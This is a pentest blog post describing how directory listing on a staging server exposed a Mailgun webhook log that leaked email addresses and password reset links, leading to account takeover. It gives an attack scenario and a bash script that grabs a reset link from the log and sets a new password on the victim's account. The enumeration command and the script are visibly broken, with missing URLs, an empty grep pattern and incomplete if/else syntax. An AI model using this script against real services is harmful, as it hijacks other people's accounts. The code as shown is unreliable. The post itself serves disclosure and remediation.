Directory Listing to Account Takeover

Directory listing is one of the most common misconfigurations which can be exploited trivially. However, the impact depends on the criticality of the files present inside the directory.

Recently, during one of my pentests, I came across an interesting open directory which I was able to leverage. On enumerating, I discovered a subdomain which was the staging server and was accessible over the internet.

[nishaanthguna:~/essentials]$ curl --silent\?q\ | sed 's/<\/\?[^>]\+>//g' | grep -i | tail -n +9 | cut -d ">" -f2 | cut -d "<" -f1

On running a port scan, it was found that the port 8080 was open and had a directory listing. There wasn’t anything sensitive until I found this.


From Mailgun’s API documentation, it looks like the admininstator can track the bounces, clicks, spam compliants, if the mail got delivered or if the user unsubscribed along with the URLs. So, what is the problem here?

Not only the logs leaked personal and developer e-mail addresses, it also did have the reset password links. Something like this,


An attack scenario would be something similar to,

  1. An attacker uses the e-mail address obtained from the logs and resets the password using ‘Forgot Password’ functionality.
  2. The victim clicks on the link sent to their e-mail address.
  3. The Attacker gets hold of the password reset token because of the directory listing and resets the password.

I wrote a quick script to curl the mailgun-webhook.log file, search for reset links and automatically reset the password.


curl | tee direct.txt
if grep -Fxq "reset" direct.txt
 echo "[+]Found a Password Reset link"
 link=$(cat direct.txt | grep -i reset | cut -d "," -f6  |
 cut -d "\\" -f1 | head -n 1)
 curl '$link'-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6)'
 --data 'password=testpassword%21%21&confirmation=testpassword%21%21' --compressed
 echo "[+]Password changed to testpassword!!"
 echo "[-]Reset link not found"

It is always recommended to disable directory listing and never store sensitive information like credentials, password reset links, API keys in cleartext.

Update - Some people are confusing this vulnerability with the recent Reddit Email Vulnerability which was used to steal Bitcoin Cash. Both of the vulnerabilities are completely unrelated except for the fact that accounts were compromised in a similar fashion.

comments powered by Disqus